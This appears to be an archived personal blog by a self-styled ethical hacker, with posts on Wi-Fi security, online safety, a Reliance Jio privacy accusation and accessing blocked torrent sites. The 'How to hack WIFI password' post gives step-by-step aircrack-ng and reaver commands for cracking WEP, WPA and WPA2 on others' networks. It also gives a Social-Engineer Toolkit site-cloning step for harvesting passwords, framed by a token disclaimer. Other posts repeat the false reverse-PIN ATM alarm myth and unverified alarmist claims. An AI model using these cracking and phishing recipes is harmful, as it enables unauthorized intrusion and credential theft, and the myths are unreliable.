Monday, October 24, 2016

Stop using Reliance JIO right now

Reliance Jio got 16 Million customer within 26 days and getting nearly 1.1 million new customer daily, Jio is supplying 16000 Tera bytes of data everyday which is the highest amount of data Supplied by a service provider, where vodafone supplies 6000 Tera Bytes of data and China mobiles supply 12000 TB of data Daily, how can a service provider supply this large amount of data daily for free? Try to understand something is terribly wrong
As per Anonymous India (@readteamin):
  Reliance Jio is sharing call data with advertisers. After the commercial launch of Jio services on 5 September, this accusation will add to the woes of the newest network provider in the market.
Last year, Anonymous India wrote a blog post citing security flaws in the Reliance Jio chat app. The post claims that the company used no encryption to transfer messages, so it was vulnerable to attacks from hackers. 
The latest revelation by Anonymous India suggests that call data from Jio apps are going to servers situated in USA and Singapore. Additionally, the data is being shared with an advertiser called Mad-Me





On its website, Anonymous also provided a step outline of how call data can be diverted to the advertiser.
1. Download and install Burp Suite (free edition) which is a security monitoring tool for applications.
2. Configure your Android device to send the traffic via Burp Suite.
3. Download My Jio app and the Jio dialer application from Google Play store.
4. Start capturing and keep intercept off.
5. Go to My Jio app and let it update.
6. Go to home and use native dialer to make calls.
7. Calling data is sent on random interval to app.cobal.mad-me.com from mobile, for fast result close all apps and open native dialer again.
8. You will get the packet being sent in proxy history.
After the launch, Jio is confronting a scarcity of SIMs because of high demand. Often, there are long lines outside Reliance digital stores. Reliance is also facing strong resistance from other telcos in giving it adequate interconnection points for calls.
Currently, Jio customers are experiencing heavy call-drops. On an average, the Jio network is seeing almost 12 crore call drops to other networks every day.
I, Agnidhra Chakraborty, as an Ethical Hacker and a citizen of India request you to stop using JIO sims for the safety of youself and your country. Keep it in your mind that these informations can be sold in deepweb against a large amount of Bitcoins, and I think Deepweb is not a perfect place where your private informations should be.

#OpStopReliance
This content is not purely original and does not bear any kind of copyright
THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.
                                                                        Email:agnidhrashim@gmail.com
                                                                       Call me : 9735689898
Posted by at 2 comments:

Tuesday, September 20, 2016

Beware of this facebook virus

Since many days I have been watching there is a video link of some individual in facebook which is tagged by some of their friends saying this is your video and this is some kind of spoof runs on an individual's facebook profile, never open that link and this is a virus generated by hackers and this uses the individual's profile picture that looks damn legitimate If you click that video, your contacts on Facebook are automatically scanned by the virus and it automatically sends a similar link to all your friends on Facebook.
This is like a chain video and it will grip anyone and everyone who clicks the video.
If something similar has happened to you, immediately alert all your friends or contacts on Facebook to not open the video. This way you can stop spreading the virus further.
How to identify the virus?
The video generally comes in this file format : http://rigvtl1f.latestnewstodays.com
It uses your pic, profile pic, etc
It tags your friends automatically
Immediately alert your friends if you see such video being posted from your timeline
How to get rid of it if you have already opened it?
Go to your activity log and delete all these posts
Remove all the suspicious apps from your Facebook profile
Clear your browser, cache and cookeis and get rid of all malicious history
Check your Desktop for any virus and scan it through your antivirus
Posted by at 1 comment:

Monday, August 22, 2016

Fake Report

If you were to believe the recent reports, you might have landed in jail for visiting a banned website or downloading a torrent. Actually, the jail sentence and the penalty of $4,500 was for a specific case for a recently released Bolloywood movie, Dishoom.
Recent media reports that one could now get three-year jail sentence as well as a fine of $4,500 for trying to visit URLs blocked by the Indian government spread like wildfire creating frenzy among the people in India in the last 24 hours.
However, there is something you should know the next time you use a proxy site or a VPN (virtual private network) to open a torrent site.
“Visiting any website, even if it is a blocked site is not illegal either under the provisions of the Copyright Act, 1957 or the Information Technology Act, 2000,” says Prasanth Sugathan, Counsel at the Software Freedom Law Centre India, a registered society that works on the intersections of law and technology. “The only exception could be if a person views child pornography.”
“Torrent sites are often used to share free and open source software and literary and artistic work licensed under Creative Commons licenses,” Sugathan adds.
So, what are the actual details that prompted the reports to float around? The issue is likely due to the John Doe orders that Indian courts are issuing at regular intervals at the request of content creators like Bollywood film makers. The lawyers of film studios often approach courts ahead of a movie’s release seeking preventive blocks on the URLs they compile in the list. IP law publication SpicyIP reported about an order from the Mumbai High Court four days ago while dealing with an anti-piracy application on behalf of the newly-released film Dishoom.
The court ruled in the case that ISPs (internet service providers) should deliver a special message with information about the provisions of the Copyright Act, along with the order in question and the suit number, instead of just displaying the standard message that says the website is being blocked.
As a result of this special message, the people would be aware as to why a page was being blocked. However, this gave rise to question that if pages are being extensively blocked because a movie studio wants to do so, then shouldn’t the people be provided the reason for the block?
To which, Tata responded to the court order saying that individually putting up special information for all the websites blocked is not technologically possible for them. As a result, the court allowed for a special compromise by providing the text that has been going viral across the internet in the last few hours. However, the below message are only seen by users of Tata’s service, which also explains why none of the other ISPs are displaying this message.
“This URL has been blocked under the instructions of the Competent Government Authority or in compliance with the orders of a Court of competent jurisdiction. Viewing, downloading, exhibiting or duplicating an illicit copy of the contents under this URL is punishable as an offence under the laws of India, including but not limited to under Sections 63, 63-A, 65 and 65-A of the Copyright Act, 1957 which prescribe imprisonment for 3 years and also fine of upto Rs. 3,00,000/-. Any person aggrieved by any such blocking of this URL may contact at urlblock@tatacommunications.com who will, within 48 hours, provide you the details of relevant proceedings under which you can approach the relevant High Court or Authority for redressal of your grievance.”
To put in context, the message displayed above talks simply of illegal viewing of the copyrighted materials. Opening or browsing a pirate website will not send you to jail other than some sneaky malwares infecting your system. Having said that, could illegally downloading content land you in jail? Yes, most definitely, as per the Copyright Act about piracy which has been around for a long time now, but has rarely been enforced.
THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.

- AgnidhraChakraborty©
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email:agnidhrashim@gmail.com
                                                                       Call me : 9735689898
Posted by at 2 comments:

Sunday, August 7, 2016

How to access TORRENTZ.EU, KAT.CR and other blocked torrent sites

For some people the title of this is quite exciting, and for some it is not, ok so let's jump into the topic, one of the most popular meta search engine torrentz has bade goodbye to his millions of user, It was founded in 2003 and served us for 13 years, but unexpectedly on 5/08/2016 it shut down unexpectedly, saying an emotional goodbye message "Torrentz will always love you. Farewell."


This is too much painful for torrent lovers but you know what, you don't have to take any kind of stress while I am here, so you wanna know how you can open torrentz again and download stuffs from it, ok in this blog I, Agnidhra Chakraborty shall describe how anyone can access TORRENTZ.EU step by step.

 So, Let's start

 First of all TORRENTZ is closed, so what you have to do is go back to the past and search your torrent, yes you have to time travel, now you may think that I have gone crazy but I have not, you can go, every webpage in the internet has a cached version of it, let's assume you want to visit a website on a specific date, so you have to search for the cached page of that site, there is an awesome tool available in the internet, it is called WAYBACKMACHINE and you can check out any site for it's old version just like torrentz.eu http://archive.org/web/ is the link where you can write an URL in the box provided and search for that

As you can see there are lots of sky blue bubbles in the calendar, now you have to click any of these available bubbles like I have clicked on 9th of july, so let's see what happens here, 
So, this is the torrentz cached page from 9th of july, now I am gonna search a torrent here and show you what happens
Here I have searched for 8 mile and you can see the results are here in front of your eye now I will click on one of those links to see what happens

As you can see it has redirected me to the torrent download site's page and you can download any torrent from here and as all of us know that KAT.CR is also banned I am going to download the torrent from KAT.CR itself, and here it is


And as you can see I am now easily able to download any torrent from any site no matter it is active or not but unfortunately we may not get future or latest torrents from here but it is useful for any purpose

IN INDIA, DOWNLOADING TORRENT IS ILLEGAL AND I DON'T PROVOKE ANYONE TO DOWNLOAD TORRENT FROM ANY SITE AS OUR HONORABLE SUPREME COURT HAS BANNED THIS SITE, THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.

THIS CONTENT IS NOT MEANT TO COPY ©, THIS IS MY RESEARCH WORK SO SUPPORT ME, DON'T STEAL MY IDEAS

                                                                                                                      - AgnidhraChakraborty©
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898




Posted by at 1 comment:

Monday, July 25, 2016

How to hack WIFI password

In the previous blog I described some DO's and DONT's and today I am gonna show you how to crack a WIFI password, but do not try this if you are not an Ethical Hacker or a Cyber Security Expert, this is illigal to hack into someone's WIFI and I am not responsible if anything goes wrong with you while doing this.

So. let's start:



You need some basic concept about computer and have a Linux Operating System for the work, Kali linux, Caine linux, Backbox, Deft linux, KNOPPIX, Parrot Security OS, Pentoo, WIFI sslax and WIFI way gets the work done but I personally prefer to use Kali Linux
-------------------------------------------------------------------------------
WEP
-------------------------------------------------------------------------------
open command terminal

airmon-ng start wlan0 (press enter after each line)

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

copy numbers to the left and make note of the channel #

airodump-ng -w derp -c (channel number here) --bssid (copied number here) mon0

open new terminal window

aireplay-ng -1 0 -a (copied number here) mon0

open new terminal window

aireplay-ng -3 -b (copied number here) mon0

wait for 10 minutes

open new terminal window

aircrack-ng derp-01.cap
-----------------------------------------------------------------------------
WPA/WPA2 version 1
-----------------------------------------------------------------------------

apt-get update

apt-get install reaver

airmon-ng start wlan0

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

reaver -i mon0 -b (copied number here) -vv
-----------------------------------------------------------------------------
WPA/WPA2 version 2
-----------------------------------------------------------------------------
open folder containing darkc0de.lst - copy and paste to the 

open command terminal

airmon-ng start wlan0 

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

copy numbers to the left and make note of the channel # and essid (name on right)

airodump-ng -w -c (channel number here) -w herp --bssid (copied number here) --ivs mon0

open new terminal window

aireplay-ng -0 1 -e (essid name here) mon01

once you have handshake

open new terminal window

aircrack-ng -w /root/Desktop/darkc0de.lst herp-01.ivs
-----------------------------------------------------------------------------
get usernames and passwords
-----------------------------------------------------------------------------

open terminal

cd /pentest/exploits/set

./set

type in whatever website you want to clone

Even you can use WIFITE in terminal or fern wifi cracker or various wifi hacking tools available in Kali Linux,

Stay safe and again DO NOT TRY THESE TOOLS IF YOU ARE NOT A PROFESSIONAL

EDUCATION PURPOSES ONLY

                                                                                                                     - AgnidhraChakraborty
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898
Posted by at 11 comments:

Friday, July 22, 2016

Some DO's And DONT's

So in the previous blog I described how to stay safe while using a WIFI router and today before starting another topic I will describe you how hackers can hack into your personal data and steal those and I will describe some Do's and Dont's in this blog.

Let's start:

1. Think before you click: Sometimes all of us face some problems while surfing internet, the problem is annoying advertisements. Those advertisements say that "Congratulations, you have won an iPhone 6S Gold, claim your reward here" or "Check this deal out, Samsung Galaxy S7 @ Rs.1 only for you, click here to know more." and I suggest you to never click that even if you find that much more tantalizing than anything, even sometimes you get an E mail from a reputated company like Cocacola or BMW saying that you have won a promo or a lottery amounting 1000000000 great Britain pound and to claim the reward please submit your Name, Age, Date of Birth along with your Bank Account Details and even your ATM pin or CVV, never bother to reveal your bank details or even any of your personal details to them, they are not from Cocacola or BMW, they are frauds who are trying to take all your money away and convert them to bitcoins and even you cannot realize that you are being a loser. Those mails are called Spamwares, even sometimes they contain a trojan like "Netbus" or something that can cause some serious issues. Or even worse can happen, you have to pay some ransom to the hackers to gain access to your own personal files, yes it is true, the malwares called ransomwares, so never click on a link without thinking what can happen in future.


This is the example of a phising E-Mail sent to me from some hackers

2.Beware of Fake Websites: Sometimes you may fall in a trap set by hackers, phissing sites, these sites are very similar to the original site but these contain some grammatical errors, low resolution images and even the url of these sites are quite different to the original website. So before logging into a website always check the URL for spelling mistakes or grammatical errors.

3.Install a Firewall: Though Microsoft provides a free firewall for Windows you should download an external firewall and I prefer Zone Alarm for that purpose, it is a lightweight free and secure firewall.

4.Online shopping and Online payment: Don’t shop on a site unless it has the “https” and a padlock icon to the left or right of the URL. Also, protect yourself and use a credit card instead of a debit card while shopping online—a credit card company is more likely to reimburse you for fraudulent charges.
Use a card of such bank which will ask for OTP and send you the SMS of the transaction along with the amount and the recipient's details.

5.Final precautions: Never use a cracked software, never use Torrent for downloading and use a genuine version of your operating system ams never use KMS pico, Remove wat and such softwares for activation and finally keep all your softwares Drivers, antivirus and Operating System updated to it's latest version.


Posted by at 2 comments:

Sunday, July 17, 2016

How to stay safe while using a WIFI router

How to stay safe while using a WIFI router:

Okay so let's start with another one. In the previous blog I described how to stay safe online or even in real life, sometimes we have to deal with some bullies or some really messed up facts so we should be always prepared for that and stay safe. Anyways couple of days ago on 14/07/2016 I had to visit one of my friend's named Gizmotech Solutions as it was the opening of his shop and there I was invited along with my best friend Subhendu Sekhar Biswas and I was late and Subhendu was already there, anyays as soon as I reached there and opened the door everyone was looking at me and I had to face an unexpected challenge. I came in and Subhendu told me "Hack the wifi"with a poker face pointing at a WIFI router on the table , everyone there except Subham and Subhendu was smiling at me and I can bet that they were thinking "Who the hell is he who can hack a damn wifi with a firewall enabled router?" Some people think that Hackers are the magicians who can hack anything in the world, but no, we are human, we have some special kind of knowledge and tools in our hand which we aquire  doing too much hard works. Anyways I accepted the challenge and started to hack the wifi, the router had a WPA2 enabled security and I had to use a special kind of tool to crack that security and then I had only my smartphone with me, then my evil side came out and I tried to cheat everyone by using WPS PUSH BUTTON, but Subham detected that said "Really, are you using WPS PUSH BUTTON?" Then he again changed the router password, this time I had to deal with a deep shit, and even I could not memorize the command required for the job, finally I succeeded to crack into the network. I know you are excited to know about the tools and tricks we use to hack and I will describe them as long as you stay with me. You can reach upto me at http://agnidhrashim.wix.com/ethical-hacker or call me(9735689898) or send an E Mail (agnidhrashim@gmail.com) for more details.

Now let's jump into the main content

Today I will tell you about various kinds of WIFI security,

When you buy a brand new router and set up it with your own bradband setting you probably have noticed some acronyms (WEP, WPA+TKIP, WPA+TKIP/AES or WPA2+AES)when you set a strong password for your router thinking that no one can crack that password now, but at the end of the month when your bill comes to your house it seems too much crazy and even you cannot afford or carry too much bill. Or even worse can happen, It is a very good morning, you woke up and now you are gonna have some coffee and suddenly someone knocks at your door, you open the door and see some police inspectors are outside and they have an arrest warrant against you because maybe someone has hacked into your WIFI has done some illigal job and you don't even have a clue of what happened, no excuses, no shit, cause police don't give a damn, they will catch you beat the hell out of you and then you have to prove yourself innocent and let them set you free,that's why I always say you, stay safe while doing some stuff, Just for ignoring the acronym any one can mess up your life, so what acronym should you choose, don't worry, I am going to clarify that now.

Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy (WEP) is the most widely used Wi-Fi security algorithm in the world. This is a function of age, backwards compatibility, and the fact that it appears first in the encryption type selection menus in many router control panels.

WEP was certified as a Wi-Fi security standard in September of 1999. The first versions of WEP weren’t particularly strong, even for the time they were released, because U.S. restrictions on the export of various cryptographic technology led to manufacturers restricting their devices to only 64-bit encryption. When the restrictions were lifted, it was increased to 128-bit. Despite the introduction of 256-bit WEP encryption, 128-bit remains one of the most common implementations.
Despite revisions to the algorithm and an increased key size, over time numerous security flaws were discovered in the WEP standard and, as computing power increased, it became easier and easier to exploit them. As early as 2001 proof-of-concept exploits were floating around and by 2005 the FBI gave a public demonstration (in an effort to increase awareness of WEP’s weaknesses) where they cracked WEP passwords in minutes using freely available software.
Despite various improvements, work-arounds, and other attempts to shore up the WEP system, it remains highly vulnerable and systems that rely on WEP should be upgraded or, if security upgrades are not an option, replaced. The Wi-Fi Alliance officially retired WEP in 2004.

Wi-Fi Protected Access (WPA)

Wi-Fi Protected Access was the Wi-Fi Alliance’s direct response and replacement to the increasingly apparent vulnerabilities of the WEP standard. It was formally adopted in 2003, a year before WEP was officially retired. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-bit keys used in the WEP system.
Some of the significant changes implemented with WPA included message integrity checks (to determine if an attacker had captured or altered packets passed between the access point and client) and the Temporal Key Integrity Protocol (TKIP). TKIP employs a per-packet key system that was radically more secure than fixed key used in the WEP system. TKIP was later superseded by Advanced Encryption Standard (AES).
Despite what a significant improvement WPA was over WEP, the ghost of WEP haunted WPA. TKIP, a core component of WPA,  was designed to be easily rolled out via firmware upgrades onto existing WEP-enabled devices. As such it had to recycle certain elements used in the WEP system which, ultimately, were also exploited.
WPA, like its predecessor WEP, has been shown via both proof-of-concept and applied public demonstrations to be vulnerable to intrusion. Interestingly the process by which WPA is usually breached is not a direct attack on the WPA algorithm (although such attacks have been successfully demonstrated) but by attacks on a supplementary system that was rolled out with WPA, Wi-Fi Protected Setup (WPS), designed to make it easy to link devices to modern access points.

Wi-Fi Protected Access II (WPA2):

WPA has, as of 2006, been officially superseded by WPA2. One of the most significant changes between WPA and WPA2 was the mandatory use of AES algorithms and the introduction of CCMP (Counter Cipher Mode with Block Chaining Message Authentication Code Protocol) as a replacement for TKIP (still preserved in WPA2 as a fallback system and for interoperability with WPA).
Currently, the primary security vulnerability to the actual WPA2 system is an obscure one (and requires the attacker to already have access to the secured Wi-Fi network in order to gain access to certain keys and then perpetuate an attack against other devices on the network). As such, the security implications of the known WPA2 vulnerabilities are limited almost entirely to enterprise level networks and deserve little to no practical consideration in regard to home network security.
Unfortunately, the same vulnerability that is the biggest hole in the WPA armor, the attack vector through the Wi-Fi Protected Setup (WPS), remains in modern WPA2-capable access points. Although breaking into a WPA/WPA2 secured network using this vulnerability requires anywhere from 2-14 hours of sustained effort with a modern computer, it is still a legitimate security concern and WPS should be disabled (and, if possible, the firmware of the access point should be flashed to a distribution that doesn’t even support WPS so the attack vector is entirely removed).
  • TKIP—Temporal Key Integrity Protocol. The replacement encryption system for WEP. Several features were added to make keys more secure than they were under WEP.
  • AES—Advanced Encryption Standard. This is now the preferred encryption method, replacing the old TKIP. AES is implemented in WPA2/802.11i.
  • Dynamic WEP (802.1x)—When the WEP key/pass phrase is entered by a key management service. WEP as such did not support dynamic keys until the advent of TKIP and CCMP.
  • EAP—Extensible Authentication Protocol. A standard authentication framework. EAP supplies common functions and a negotiation mechanism, but not a specific authentication method. Currently there are about 40 different methods implemented for EAP. See WPA Enterprise.
  • 802.1x, IEEE8021X—The IEEE family of standards for authentication on networks. In this context, the term is hopelessly ambiguous.
  • LEAP, 802.1x EAP (Cisco LEAP)—(Lightweight Extensible Authentication Protocol) A proprietary method of wireless LAN authentication developed by Cisco Systems. Supports dynamic WEP, RADIUS and frequent re authentication.
  • WPA-PSK, WPA-Preshared Key—Use of a shared key, meaning one manually set and manually managed. Does not scale with a large network either for manageability or security, but needs no external key management system.
  • RADIUS—Remote Authentication Dial In User Service. A very old protocol for centralizing authentication and authorization management. The RADIUS server acts as a remote service for these functions.
  • WPA Enterprise, WPA2 Enterprise—A trade name for a set of EAP types. Products certified as WPA Enterprise or WPA2 Enterprise will inter operate (EAP-TLS, EAP-TTLS/MSCHAPv2, PEAPv0/EAP-MSCHAPv2, PEAPv1/EAP-GTC & EAP-SIM)
  • WPA-Personal, WPA2-Personal—See Pre-Shared Key.
  • WPA2-Mixed—Support for both WPA1 and WPA2 on the same access point.
  • 802.11i—An IEEE standard specifying security mechanisms for 802.11 networks. 802.11i uses AES and includes improvements in key management, user authentication through 802.1X and data integrity of headers.
  • CCMP—Counter Mode with Cipher Block Chaining Message Authentication Code Protocol. An encryption protocol that uses AES.

Now all of us know everything about the WIFI security, but if you are lazy enough to read the whole document just select simply select WPA 2 and don't feel free that now no one can crack into your WIFI network, if possible just keep changing it every week. That's it for know, I will describe some other techniques later in my blogs
                                                                                                        - Agnidhra Chakraborty
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898
                                                                                        
Posted by at 2 comments:

Friday, July 15, 2016

How to stay safe online

How to stay safe online

In the previous blog we were talking about ethical and non ethical processes of hacking and I gave the definition of ethical hacking, ethical hacking is mainly for good purposes but if we omit the word "Ethical" then it is gonna create a confusion among us.
In simple terms hacking is nothing but breaking into someone else's computer or system by
circumventing the safety measures and stealing the information contained within, or worse, sabotaging the entire system. And that is clearly a criminal offence but people like us use it for some good purposes, like betting with your friend that you can hack your friend's wifi, helping government to detect a criminal and so on....
Hacking into someone's else'e wifi connection is illigal if he/she is not even aware that you are doing so, and in future I will describe some tools that are really powerful to hack into someone's wifi and steal his/her personal information, but this blog is for educational purposes only, if you get arrested or caught in the act somehow, you don't know me and you have never read my blog.
In its most elemental form, hacking can be defined as the process of ascertaining and the subsequent
exploitation of the various shortfalls and weaknesses in a computer system or a network of such
computer systems. This exploitation may take the form of accessing and stealing of information,
altering the configuration, changing the structural picture of the computer system and so on.

 Now we will get some basic knowledge about penetration testing:

Penetration testing is the process whereby a deliberate attack is mounted on a computer system, in
which its weak spots are noted, and the data stored in it is accessed. The intention is to demonstrate
and thereby ascertain the efficiency of the security safeguards installed in the system.

The primary objective of penetration testing is to find out the vulnerable areas in a system and fix
them before any external threat compromises them. The key areas to be tested in any penetration
testing are the software, hardware, computer network and the process.

The testing can be done both in an automated way as well as manually. The automated method makes
use of software and programs that the penetration tester has composed, which are then run through the system and network. All vulnerabilities cannot be detected by performing a penetration testing.

Penetration testing mainly detects some loopholes or something that makes a server or a Personal computer network vulnerable or even makes your firewall weak and we can get access to your computer and yes dude we can control your life, everything you do online and even we can play GTA with your life, so I suggest you to maintain some basic security aspects.

 How to partially secure yourself ?

 Yes you can secure yourself, but "partially", I am using the term partially because there is no such security that we cannot bypass but the more you take precaution, the harder it gets for us to break into your system.

So now we are gonna talk about how one can secure himself,

Here we go:

Step 1: Always make sure that your password is minimum 13 characters long and contains atleast one UPPER CASE, one lower case, one $pecial character and it should not contain any common word that is available in dictionary.

Step 2: Never share your password with anyone, yes I mean "ANYONE"

Step 3:If you even share your password with someone whom you believe more than any one then do not share that in facebookwhatsapp or any kind of social networking site, Just write down your password with pen and paper and give it to him/her.

Step 4: Keep your PC softwares and operating system upto date and never bother to use a cracked software.

Step 5: If you use a home network and a wifi router then try to use WPA or WPA2 protection but never use WPS or WEP protection because cracking a WPS enabled password is kid's play for us but WPA and WPA 2 is not as easy as it seems, it can take upto 2 hours or more for us to crack that security, later I will describe what is WPS, WPA and WPA 2.

Step 6: Never use the same password for every account, always try to use different passwords and if you cannon remember them then use a trick, Suppose your password is "I lovetowatchmovies!"
then for twitter, facebookyoutube just add one or two initial letters of that account just like
"I lovetowatchmovies!Tr" for twitter, "I lovetowatchmovies!Fb" for facebook and so on.

Step 7: Never use free public wifi, whatever happens with your life, and if you have to use one then make sure that you are not logging into any one of your account using password and never ever do online transactions from your account while using the public wifi.

Step 8: If you get some call and the guy on the other side claims that he is calling from your bank and asks for your account details, IFSC, card no, pin or CVV, then always try to avoid those things and if he disturbs you again and again first go to your bank branch for verification and then go to the nearby police station and file a complaint against the caller with his phone no.

Step 9: While using bank ATM, if you find any kind of abnormal behaviour of the ATM as example the display is not clear enough, or if you feel difficult to punch your card in the slot and if you feel that something wrong with the buttons by which you have to type the pin then don't do any kind of activity like transaction or taking a mini statement and contact your local bank branch or police station, and if someone make you do transaction forcefully by pulling out a gun at you, then no problem buddy, just type your pin in reverse as example if your pin is 1234, then simply type 4321,
In this way the ATM will do a successful transaction but the money will not come out and on the other hand it will inform the nearest police station that you are in trouble.

Step 10:  Last but not the least, you must have to install a firewall for your computer, though there is an in built firewall available for your pc provided by microsoft but I suggest you to use a free firewall named Zone Alarm security available at http://www.zonealarm.com/software/free-firewall/

And by taking these small steps you can make your life safer and easier than ever.
That's it for now, I will describe some of the tools used by professionals for penetration testing

          - AgnidhraChakraborty
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898
Posted by at 1 comment:
Subscribe to: Posts (Atom)